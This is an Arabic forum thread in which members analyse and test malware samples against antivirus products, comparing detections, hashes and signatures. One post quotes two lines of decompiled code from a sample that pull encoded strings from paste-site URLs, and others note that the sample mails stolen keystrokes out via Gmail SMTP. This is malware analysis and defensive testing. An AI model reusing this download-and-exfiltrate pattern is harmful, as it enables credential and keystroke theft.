عـيـنة 28-05-2015#12

الحالة
مغلق و غير مفتوح للمزيد من الردود.
كاش بش قال:
هل مكشوف قبل التجربه
هل المتصفح افتراضي ؟
هل كان شغال ؟
لو كان افتراضي اتوقع الملف الضار عملhook +injactor مثل طريقه السالتي
لابد دائمن ان نفكر لماذا حذف الملف دقق فيه قليلا
لاتسنى البرنامج لا يحذف كذا هباء
شركه عريقه ولها مستخدمتها
صحيح في اخطاء بس ما توصل هيك
بالتوفيق
أنقر للتوسيع...

افترضت نفس افتراضك انه يمكن ان يكون قد حقن فى المتصفح لدى عبد الكريم

لكن الملف لا يعمل اى عمليه حقن

Ahmed_Albosife قال:
اخي مصطفي هل هذه الاسطر تدل علي ان الملف يقوم بتحميل السترنق من الانترنت ؟

كود: 
  string str4 = client.DownloadString("http://textup.fr/129188c1?filetype=txt");
    string str = client2.DownloadString("http://textup.fr/129228SD?filetype=txt");
أنقر للتوسيع...

Ahmed_Albosife قال:
[hide]هوست smtp.gmail.com
بورت 587
+
هنالك ايميلات داخل العينة 3
[/hide]
أنقر للتوسيع...

كيلوجر اخى احمد او استيلر

طلما هناك ايملات

+

الملفات المحمله لجمع ما كتبته وهى على امتداد تكست

اذا فتحتهم ستجد بداخلهم كلام مشفر

وهى روابط مشفره
 

توقيع : black007
توقيع : ahmed@salah
*وعليكم السلام ورحمة الله وبركاته*

eset Ss8

11/12

العينة المتبقية SAMBLE.3 بلتشغيل رصد الاتصال فقط



[hide]
Capture.webp
[/hide]

 
توقيع : ALI 145
الانترنت عندى ضعيف جدآ
اعدت التجربة على العينةsample 10))
720196676.png

بالنسبة للتوقيع الرقمى للعينة رقم sample6ليست موقعه بتوقيع رقمى ..لان الكاسبر لم يوثقه ووضعه فى قيود ضعيفه
(توقيع رقمى مزيف)
 
التعديل الأخير:
توقيع : ALmehob
AhmEd@saLaH قال:
كيف اخي برامج تجميد لا افهم
أنقر للتوسيع...
برنامج تجميد النظام يعنى تعمل تجميد لجهازك قبل كل تجربة وحتى لو تم اختراقك عند التجميد او ضرب فيروس جهازك اغلق الجهاز وشغله من جديد وكأن شئ لم يحصل
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[hide]nnysg-y5fjb-jfpe2-fcz9n-pek1p[/hide]

هنا شرح البرنامج
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
 
توقيع : ALmehob
كاش بش قال:
هل مكشوف قبل التجربه
هل المتصفح افتراضي ؟
هل كان شغال ؟
لو كان افتراضي اتوقع الملف الضار عملhook +injactor مثل طريقه السالتي
لابد دائمن ان نفكر لماذا حذف الملف دقق فيه قليلا
لاتسنى البرنامج لا يحذف كذا هباء
شركه عريقه ولها مستخدمتها
صحيح في اخطاء بس ما توصل هيك
بالتوفيق
أنقر للتوسيع...

المتصفح افتراضي و لم يكن مكتشفا قبل التجربة

و كان مقفلا اثناء التجربة لكن بمجرد الضغط عليه لكي يفتح اشتبه فيه الافجي

انظر الى اسم الاكتشاف "unknown" و هذا النوع من الاكتشافات من قبل وحدة identity protection و هي بمثابة محلل سلوك البرنامج يترك فيه القرار للمستخدم للموافقة على الحذف او اعتباره انذارا كاذبا، لكن انا من غير الاعدادات و جعلها تلقائية
حتى التعليقات في موقع البرنامج الكثير منها يشتكي من الانذارات الكاذبة المنضوية تحت هذا الاسم
غباء.webp


اما التهديدا التي يتصرف فيها البرنامج بطريقة تلقائية فيكون اسمها مبتدءا ب IDP.trojan.xxxxxx او IDP.program.xxxxxx ...........

و حتى و ان كان الامر كما تفظلت عملية حقن فالاولى ان يمنع البرنامج الحقن لا ان يحذف المتصفح
+
بعد ان حذف الافجي cyberfox فتحت firefox بعدها مباشرة و لكن لم يقم البرنامج بحذفه كما فعل مع سابقه
 
تفضل أخي أحمد
[hide]
كود: 
SHA1  ccd0765d75d98766d4c06e8b109e26ee116c291d
[/hide]
 
توقيع : أبو رمش
[hide]
كود: 
SHA256 6d8aa95ebf485a1c5a59f2390a2cd197b19557eb7c073641bcd1d4368c4db84f
[/hide]
 
توقيع : أبو رمش
توقيع : tiktoshitiktoshi is verified member.
tiktoshi قال:
كيف لم افهم قصدك
أنقر للتوسيع...

العزيز مصطفى وعد بعينة يخترق فيها تحصينات الأفيرا .

هل هذه هي العينة المرتقبة ؟

ود
 
sabir_2007 قال:
العزيز مصطفى وعد بعينة يخترق فيها تحصينات الأفيرا .

هل هذه هي العينة المرتقبة ؟

ود
أنقر للتوسيع...


سحابة الافيرا عاملة مشكل للهكر وفي جميع منتديات يشتكو من سحاب
 
توقيع : tiktoshitiktoshi is verified member.
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى